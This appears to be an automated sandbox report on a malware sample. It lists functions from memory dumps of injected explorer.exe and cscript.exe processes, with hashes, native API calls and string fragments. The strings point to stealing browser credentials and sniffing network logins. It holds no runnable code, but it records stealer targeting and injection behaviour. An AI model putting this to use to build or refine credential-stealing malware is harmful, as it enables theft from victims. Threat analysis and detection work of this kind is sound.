Instruction ID: 1324c5ee16461b313f27a6126ec14473ef1796e5ca9deae38788a48845f5e905
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: B8C16A74618B0A9BC758EF28C485AEAF3E5FB94308F40862E949EC7250DF70F515CB86

Uniqueness

Uniqueness Score: -1.00%

Function 118FEF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

., xrefs: 118FEF63
r, xrefs: 118FEF90
c, xrefs: 118FEFC8
0, xrefs: 118FEF5B
r, xrefs: 118FEFA0
r, xrefs: 118FEF98
r, xrefs: 118FEF88
r, xrefs: 118FEFC0
r, xrefs: 118FEFB8
r, xrefs: 118FEFB0
n, xrefs: 118FEF6B
r, xrefs: 118FEFA8

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 80973e9031db2bcbb4932ea1d16d6fd93294dc04c7410af2fb3bf858ba5f9f97
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 4351E5355187488FD709CF18D8812AAB7E5FBC5704F505A2EE8CBC7242DBB4A546CB82

Uniqueness

Uniqueness Score: -1.00%

Function 118F82F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 118F84DB
dll, xrefs: 118F832E
sspi, xrefs: 118F8320
l, xrefs: 118F84E2
opera_browser.dll, xrefs: 118F8629
dragon_s.dll, xrefs: 118F8614
nspr, xrefs: 118F84D4
cli., xrefs: 118F8327

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: cfc06163ceb151aac5dc159ec435cae0cde4ef2bcd5f8d4068d49e0de59a8384
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: D7C1A175628A1A4FC758EF68D495AAAB3E5FB98308F50832D845EC7254DF30EA01C7C5

Uniqueness

Uniqueness Score: -1.00%

Function 118F82F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 118F84DB
dll, xrefs: 118F832E
sspi, xrefs: 118F8320
l, xrefs: 118F84E2
opera_browser.dll, xrefs: 118F8629
dragon_s.dll, xrefs: 118F8614
nspr, xrefs: 118F84D4
cli., xrefs: 118F8327

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: da7af58f0130fb747132dda5ac731f3702bf344d2081a19b7a87626073b5f0f7
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 19C1B274628A1A4FC758EF68D495AAAB7E5FF98304F50832D845EC7250DF30EA01C7C5

Uniqueness

Uniqueness Score: -1.00%

Function 118F9CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

Pass, xrefs: 118F9D97
L: , xrefs: 118F9D66
2, xrefs: 118F9DE1
word, xrefs: 118F9D9E
UR, xrefs: 118F9D5F
User, xrefs: 118F9DAB
name, xrefs: 118F9DB2

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: feee7ed0cec1a5fa959ce456c53854b78c7f9ecfc95391298f4f47268ea5747a
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: E5A1BD70A187498BDB19DFA8D444BEEB7E5FF88304F00862DE48AD7291EF7095458789

Uniqueness

Uniqueness Score: -1.00%

Function 118F9CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

Pass, xrefs: 118F9D97
L: , xrefs: 118F9D66
2, xrefs: 118F9DE1
word, xrefs: 118F9D9E
UR, xrefs: 118F9D5F
User, xrefs: 118F9DAB
name, xrefs: 118F9DB2

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 964afaab6b471ea16513eef4296614cde24512761a6a458e3456cfb9ca9d6f3f
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 62919C70A18B498BDB19DFA8D444BEEB7F1FF88304F00862EE48ED7251EB7095458789

Uniqueness

Uniqueness Score: -1.00%

Function 118F9352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

, xrefs: 118F947C
e, xrefs: 118F948E
., xrefs: 118F93B0
v, xrefs: 118F94A0
n, xrefs: 118F93E7

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 4a5fc99543c54d3c60f92a6effbd261f8b25acfbe7b97c2008db555e48b4ab06
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: AB71B475A18B498FD718DF68C4887AAB7F4FF58304F00062EE49AC7261EF71E9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 118F4C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

dll, xrefs: 118F4C9E
l32., xrefs: 118F4C97
shel, xrefs: 118F4C90
2.dl, xrefs: 118F4C64
ole3, xrefs: 118F4C5D

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 218c423250a3f7d2ef629d720e7754f8fa31561f50a0b09698105ec10c49496a
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 2C516FB0918B4D8FDB54DFA8C045AEEB7F1FF58304F40462E949AE7214EF70A5518B89

Uniqueness

Uniqueness Score: -1.00%

Function 118F586F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 118F58F4
4, xrefs: 118F59E9
ion., xrefs: 118F58EC
\, xrefs: 118F59E0
vers, xrefs: 118F58E4

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: c96abac9f75da0244fb46ac677783a46eb220328160059d97f7ed2fac03a84a9
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: E6418535228B4E8FDB65DF2898457EB77E4FB98305F41862E945EC7240EF30D5158782

Uniqueness

Uniqueness Score: -1.00%

Function 118F74B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 118F7515
dll, xrefs: 118F751C
sspi, xrefs: 118F750E
32.d, xrefs: 118F74DA
user, xrefs: 118F74D3

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: b4a872bfba2441dabfd1e257473bb6e28f6b571a1f2f1310e2b9bb11c1c25443
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 43415E70A18E4E8FDB94EF6890997ED77E1FB5C304F51866AA80ED7210DA70D5408BC6

Uniqueness

Uniqueness Score: -1.00%

Function 118F5432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

el32, xrefs: 118F5537
kern, xrefs: 118F552A
h, xrefs: 118F551F
.dll, xrefs: 118F553F

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 6cca1d0f23cba98ff3232f258811814b9e4ae817e7fd9c2ab3a812d4d4ef3cc3
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 0E419470608B4E8FD759DF2884883AABBE1FB98305F108A6F949EC7255DF70D545CB81

Uniqueness

Uniqueness Score: -1.00%

Function 118FC0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

, xrefs: 118FC184
f fr, xrefs: 118FC13D
Snif, xrefs: 118FC154
om:, xrefs: 118FC146

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 67c8a372d602648f0d5e4a1c1658a33ab423d4e67765e7d60303b037781112d2
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 9031E67550CB895FD71ADB28C4846EAB7D4FB84300F50491EE4ABD7251EE30B549CB43

Uniqueness

Uniqueness Score: -1.00%

Function 118FC0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

, xrefs: 118FC184
f fr, xrefs: 118FC13D
Snif, xrefs: 118FC154
om:, xrefs: 118FC146

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 566656203df531d7371b32ce496551aa215794e18b97bc0aafe563e54b1315b3
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 4531C175508B496FD71ADB28C484AEAB7D4FB94300F50492EE4ABD7251EE30E64ACA43

Uniqueness

Uniqueness Score: -1.00%

Function 118F7FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 118F8023
.dll, xrefs: 118F7FFE
hild, xrefs: 118F7FF6
me_c, xrefs: 118F7FEE

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 8dd73333e5d028319779187d0fc6653679336933b1c41aa70089bf24d5e65e72
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 3D315C74618A5A4FC784EF688494BAAB6E1FB98304F94863D944ECB214DF30D945C752

Uniqueness

Uniqueness Score: -1.00%

Function 118F7FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 118F8023
.dll, xrefs: 118F7FFE
hild, xrefs: 118F7FF6
me_c, xrefs: 118F7FEE

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 15aea6f459e7b3708c2debd439022cfee3df77a9b339a2bb1e5c63eb8f35bf5c
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: C9316970228B5A8FC784DF688494AAAB7E1FF98304F94863D944ECB254DB30D905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 118FA8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 118FA959
on.d, xrefs: 118FA902
nt: , xrefs: 118FA91E
User-Agent: , xrefs: 118FA935, 118FA948

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 3c268c49cf20d2663d04b9ee7d309185c2e01b4d8c12ccc021ddc59a78953984
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 2D31FF31710A4E8BCB01EFA8C8887EEBBE4FB58319F00422AD45ED7240DE789644C789

Uniqueness

Uniqueness Score: -1.00%

Function 118FA8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 118FA959
on.d, xrefs: 118FA902
nt: , xrefs: 118FA91E
User-Agent: , xrefs: 118FA935, 118FA948

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 43968281413fb8d43ad2a26ebd49c981197d29ae5862fbeae2d5473766686f36
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 4921CE74A10A4E8BCB05EFA8C8847EDBBA4FF58309F40422ED46ED7250DE7496458B99

Uniqueness

Uniqueness Score: -1.00%

Function 118FBE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 118FBF1F
t, xrefs: 118FBEF4
l, xrefs: 118FBF03
l, xrefs: 118FBF26

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: a75654cfc559dea1efeb3a1b427e62338fc47dc6aec7718e47f399d97cbf9e7a
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: FC215AB4A24A0E9BDB48EFA8D4447E9BBF1FB18304F50462ED05DD3600DB74E5918B84

Uniqueness

Uniqueness Score: -1.00%

Function 118FBE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 118FBF1F
t, xrefs: 118FBEF4
l, xrefs: 118FBF03
l, xrefs: 118FBF26

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 4243dba5484084f6f409a4cbf232192b451e03f8b14b32adece099ef9a9504b9
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: AF2148B4A24A0E9BDB48EFA8D0447AABAF1FB58304F50462ED05DD3610DB74E5918B84

Uniqueness

Uniqueness Score: -1.00%

Function 118FBFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

auth, xrefs: 118FC02F
user, xrefs: 118FC015
pass, xrefs: 118FC022
logi, xrefs: 118FC03C

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 189dc6c83f84c8362c7286ede895c4fd5be0a7803f95175bca8d141abc9e07b4
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: E721CDB0614B0E8BCB05CF9E98806DEB7E1EF88344F004629E40AEB344D7B1E9158BC6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cscript.exePID: 5612, Parent PID: 5384COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	1.9%
Signature Coverage:	0%
Total number of Nodes:	633
Total number of Limit Nodes:	77

Executed Functions

Function 021AA360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,021A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,021A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 021AA3AD

Strings

.z`, xrefs: 021AA39D, 021AA3A8

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: b72aa6b4d2807efd49b222fabe0067d14765b65f6151f3b2ec39c5062bdae810
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 7FF0BDB2200208AFCB48CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 021AA53A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02192D11,00002000,00003000,00000004), ref: 021AA579

Strings

U, xrefs: 021AA53A

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: U
API String ID: 2167126740-3372436214
Opcode ID: 49568251c8b239eb70900aa0ff838adf82063e56f60fe6115102c6a3cc50adec
Instruction ID: f23133d7cd783bed06c1935f4a6a39bbdbd2e337e30ff4d27ab56bc3b7f07370
Opcode Fuzzy Hash: 49568251c8b239eb70900aa0ff838adf82063e56f60fe6115102c6a3cc50adec
Instruction Fuzzy Hash: 77F0F8B6200208AFCB18DF88CC81EEB77B9EF88754F118148FA1997241C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 021AA410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(021A4D72,5EB65239,FFFFFFFF,021A4A31,?,?,021A4D72,?,021A4A31,FFFFFFFF,5EB65239,021A4D72,?,00000000), ref: 021AA455

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: b603ce1e0a9d4e0a1dd5b6e18b7d9c026cab5592f033d8a7ba2a2b15e7f78624
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: CDF0B7B6200208AFCB18DF99DC90EEB77ADEF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 021AA540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02192D11,00002000,00003000,00000004), ref: 021AA579

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: cf1c2beea496dc433256654194f30790f21080b291b03800b20b3919884e031f
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: CEF015B6200208AFCB18DF89CC80EAB77ADEF88754F118148BE0897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 021AA490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(021A4D50,?,?,021A4D50,00000000,FFFFFFFF), ref: 021AA4B5

Memory Dump Source

Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2190000_cscript.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 40d9a86f91e42103a2d73a4ab97e25ad08f1744524982cf0de2e456cf3cb8112
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 88D012762402146BD714EB98CC45E97776DEF44750F154455BA185B241C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04692C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692C3A

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82df7a02770bbe8c6a8a6db72456eceec219997848ac17338ebd80920db724c7
Instruction ID: 539fed9f9fc3bb93284258650aba7d2e086b53fc83cbaa5962e457db34818520
Opcode Fuzzy Hash: 82df7a02770bbe8c6a8a6db72456eceec219997848ac17338ebd80920db724c7
Instruction Fuzzy Hash: 0690022961350002F6847558550860A000587D1246F91D819A0016658CDD25DC796722

Uniqueness

Uniqueness Score: -1.00%

Function 04692CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692CFA

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f39dd2cb65db084d36763ccd841bb61d30e250ace80fd78a1ceab440a531a6b
Instruction ID: 2dd910edef0fa7085e4f760e8900db8430a8679007bd6a197333c0f039105287
Opcode Fuzzy Hash: 0f39dd2cb65db084d36763ccd841bb61d30e250ace80fd78a1ceab440a531a6b
Instruction Fuzzy Hash: 3D900221642541527A49B5584504507400697E0285791C416A1415A50CD936EC66EA22

Uniqueness

Uniqueness Score: -1.00%

Function 04692D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04692D1A

Memory Dump Source

Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true

Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4620000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9aa7abb86a127b65cdfe1f919310747a68282b9c611ffdd622b176d4868709d
Instruction ID: aa47fc46b9b905d22c259836047ffde6f48d1cd07d8b22f6b8403378b4b3565a
Opcode Fuzzy Hash: d9aa7abb86a127b65cdfe1f919310747a68282b9c611ffdd622b176d4868709d
Instruction Fuzzy Hash: E790023160150413F61575584604707000987D0285F91C816A0425658DEA66DD62B522

Uniqueness

Uniqueness Score: -1.00%

